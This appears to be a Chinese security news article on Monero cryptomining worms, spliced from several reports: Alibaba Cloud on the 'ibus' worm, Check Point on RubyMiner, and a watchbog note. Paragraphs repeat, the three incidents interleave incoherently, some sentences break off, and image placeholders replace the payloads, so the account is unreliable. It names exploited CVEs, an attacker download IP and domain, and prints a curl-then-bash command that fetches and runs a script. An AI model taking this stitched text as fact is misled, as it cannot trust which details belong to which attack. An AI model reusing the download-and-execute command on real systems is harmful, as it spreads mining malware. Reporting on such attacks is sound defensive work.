图片 10

注意了:门罗币恶意挖矿机已瞄准Linux和Windows服务器

背景

近日阿里云安全团队发现了一起利用多个流行漏洞传播的蠕虫事件。黑客首先利用ThinkPHP远程命令执行等多个热门漏洞控制大量主机,并将其中一台“肉鸡”作为蠕虫脚本的下载源。其余受控主机下载并运行此蠕虫脚本后,继续进行大规模漏洞扫描和弱口令爆破攻击,从而实现横向传播。涉及的漏洞除了ThinkPHP远程命令执行漏洞,还有JBoss、Weblogic、Redis等产品的漏洞。

Check
Point和Certego发布报告指出,近期新型加密货币挖矿恶意软件“RubyMiner”使用多项漏洞利用,在网上搜寻老旧的Web服务器,企图感染目标。

近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository
Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件。

因为该蠕虫最初植入的恶意脚本名为ibus,所以命名为ibus蠕虫。本篇文章主要介绍了阿里云安全对此类蠕虫入侵的各个阶段的检测、防御和隔离,保障阿里云用户的资产安全。希望读者通过本篇文章,可以意识到当前网络安全的风险与日俱增,安全漏洞无处不在,黑客通过简单、自动化的手段就可以对用户利益造成极大的损害。

攻击者瞄准Linux和Windows服务器

Ixia的安全研究人员斯蒂芬·塔纳斯(Stefan
Tanase)向外媒表示,RubyMiner组织使用Web服务器识别工具“p0f”扫描识别运行过时软件的Linux和Windows服务器。一旦识别出未打补丁的服务器,攻击者会利用已知的漏洞利用实施入侵,并利用RubyMiner进一步感染目标。

Check
Point和Ixia公司称,它们发现攻击者在近期这起攻击活动中部署以下漏洞利用:

Ruby on Rails XML处理器YAML反序列化代码执行漏洞 (CVE-2013-0156)

PHP php-cgi
查询字符串参数代码执行漏洞
(CVE-2012-1823、CVE-2012-2311、CVE-2012-2335、 CVE-2012-2336、
CVE-2013-4878)

微软IIS ASP 脚本源代码泄露漏洞(CVE-2005-2678)

显而易见,RubyMiner的目标是Windows和Linux系统。

值得注意的是,这一攻击开始的时间,与2月5日上述产品的母公司发布漏洞公告,相隔仅仅半个多月,再次印证了“漏洞从曝光到被黑产用于挖矿的时间越来越短”。此外,攻击者还利用了Supervisord,
ThinkPHP等产品的漏洞进行攻击。

目前阿里云安全团队对网络进行了实时监控,并帮助云上用户修复潜在风险,如果漏洞依然存在,建议请尽快对自身进行检查,或者参考文末的安全建议。

攻击者将恶意代码隐藏在robots.txt文件中

Check
Point根据其蜜罐收集的数据破解了RubyMiner在Linux系统上的感染程序,从而得出以下结论:

漏洞利用包含一系列Shell命令;

攻击者清除了所有Cron定时任务;

攻击者新增每小时要执行的Cron定时任务;

新的Cron定时任务下载在线托管的脚本;

脚本藏在各个域名的robots.txt文件内;

脚本下载并安装篡改版的XMRig门罗币挖矿应用。

Check
Point的安全研究人员勒特姆·芬克尔斯坦向外媒表示,他们发现攻击者以Windows
IIS服务器为目标,但尚未能获取这款恶意软件的Windows版副本。

这起攻击之所以被发现,部分原因在于攻击者用来将恶意命令隐藏到robots.txt(lochjol[.]com)的其中一个域名曾在2013年的一起恶意软件攻击活动中使用过。后者也使用了RubyMiner部署的Ruby
on Rails漏洞利用,这说明这些攻击活动是同一组织所为。

本文分析了该木马的内部结构和传播方式,并就如何清理、预防类似挖矿木马给出了安全建议。

基于阿里云态势感知的大数据平台,我们对该黑客组织进行了追踪和详细分析,该黑客通过ThinkPHP漏洞和蠕虫脚本获取了大量的肉鸡进行牟利。阿里云安全团队详细分析了此蠕虫的主要特点,包括:

RubyMiner已感染700台服务器

据Check
Point预估,RubyMiner感染的服务器数量大约有700台。从RubyMiner部署的自定义挖矿程序中发现的钱包地址来看,攻击者赚取了约540美元。

由研究人员认为,如果攻击者使用最近的漏洞利用,而非十年前的漏洞,其成功率会更高。比如,最近媒体报道称,2017年10月攻击者曾利用Oracle
WebLogic服务器赚取了22.6万美元。

挖矿木马传播分析

使用多种漏洞进行传播,以web代码执行漏洞为主;

门罗币挖矿恶意软件不断增多

近几个月,加密货币挖矿攻击企图猖獗,尤其是门罗币挖矿恶意软件。除了门罗币劫持事件,2017年出现了众多门罗币挖矿恶意软件,包括Digmine、
Hexmen、Loapi、Zealot、WaterMiner、CodeFork和Bondnet。研究人员在2018年年初的两周就已经发现针对Linux服务器的恶意软件PyCryptoMiner,此外,研究人员还发现有黑客利用Oracle
WebLogic漏洞开采门罗币。

上述提到的大多数瞄准Web服务器的挖矿攻击事件中,攻击者尝试利用最近的漏洞利用。但是,RubyMiner较特殊,因为攻击者使用的是非常老旧的漏洞利用。芬克尔斯坦表示,攻击者可能一直在故意搜寻系统管理员遗忘在网络上的PC以及使用老旧版本的服务器。感染这些设备意味着能长期潜伏进行挖矿。

背景

  • 恶意脚本的名字及路径具有迷惑性,且多份拷贝存放于不同的目录下;
  • 主要代码perl实现,具备功能完备的C&C通信模块;
  • C&C通信使用http协议,通信内容加密;
  • 通过挖掘门罗币进行获利。

近日,阿里云安全监测到watchbog挖矿木马使用新曝光的Nexus Repository
Manager 3远程代码执行漏洞(CVE-2019-7238)进行攻击并挖矿的事件。

蠕虫的功能结构由恶意脚本、传播模块、C&C模块、挖矿模块等组成。

值得注意的是,这一攻击开始的时间,与2月5日上述产品的母公司发布漏洞公告,相隔仅仅半个多月,再次印证了“漏洞从曝光到被黑产用于挖矿的时间越来越短”。此外,攻击者还利用了Supervisord,
ThinkPHP等产品的漏洞进行攻击。

黑客首先利用ThinkPHP v5
远程命令执行漏洞攻击了大量主机,并将ip为67.209.177.163的服务器作为蠕虫脚本的下载源。

本文分析了该木马的内部结构和传播方式,并就如何清理、预防类似挖矿木马给出了安全建议。

之后攻击者控制其他被入侵主机从67.209.177.163下载ibus脚本并执行。该脚本用perl语言写成,主要功能是解码、写入并执行C&C
(Command and Control)模块。

挖矿木马传播分析

攻击者进而通过向C&C模块发送命令,下载包含多种攻击payload的传播模块,以及由下载器、配置文件和挖矿程序组成的挖矿模块,挖矿从而获取利润。传播模块则继续攻击未被入侵主机,横向传播。

攻击者主要通过直接攻击主机服务的漏洞,来进行木马的传播,也就是说它目前不具备蠕虫的传染性,这一点上类似8220团伙。即便如此,攻击者仍然获取了大量的肉鸡。

黑客入侵的各个阶段如下图所示:

尤其2月24日,攻击者从原本只攻击ThinkPHP和Supervisord,到加入了Nexus
Repository Manager
3的攻击代码,可以看到其矿池算力当天即飙升约3倍,达到了210KH/s左右(盈利约25美元/天),意味着最高时可能有1~2万台主机受控进行挖矿。

图片 1

图片 2

1.攻击及恶意脚本植入

以下为阿里云安全采集到的3种攻击payload

对大多数被入侵主机,攻击者最初是利用ThinkPHP v5
远程代码执行漏洞,通过如下payload植入恶意脚本

针对Nexus Repository Manager 3 远程代码执行漏洞(CVE-2019-7238)的利用

图片 3

图片 4

可以看到这里从

针对Supervisord远程命令执行漏洞(CVE-2017-11610)的利用

图片 5

图片 6

之后对列表中的目录进行打分,取分数最高的三个目录。打分标准例如完整路径以”/bin”开头的目录分数最高,”/usr/bin”其次,以此类推。

针对ThinkPHP远程命令执行漏洞的利用

图片 7

图片 8

在最后挑选出来的三个目录中,写入同样的C&C模块脚本,并分别命名为nmi,
nbus和.dbus。这三个都是系统程序的名字,定时执行时还会打印出“These are
for bus-kernl-daemon service”,非常具有迷惑性。

以上三种payload的目的都是相同的,那就是控制主机执行以下命令

图片 9

curl -fsSL -o /tmp/baby; bash
/tmp/baby

​ibus脚本最后进行定时任务添加和脚本自删除操作。

木马功能结构分析

图片 10

图片 11

​2.传播模块

被攻击的主机受控访问
,经多次跳转后,会得到如下图所示的shell脚本,其包含cronlow(),
cronhigh(), flyaway()等多个函数。

下图为攻击函数列表,可以看出此蠕虫代码利用了多种漏洞进行横向传播,包括java反序列化漏洞、Weblogic
WLS组件RCE漏洞(CVE-2017-10271)、WebLogic
任意文件上传漏洞(CVE-2018-2894)、redis 未授权访问漏洞等。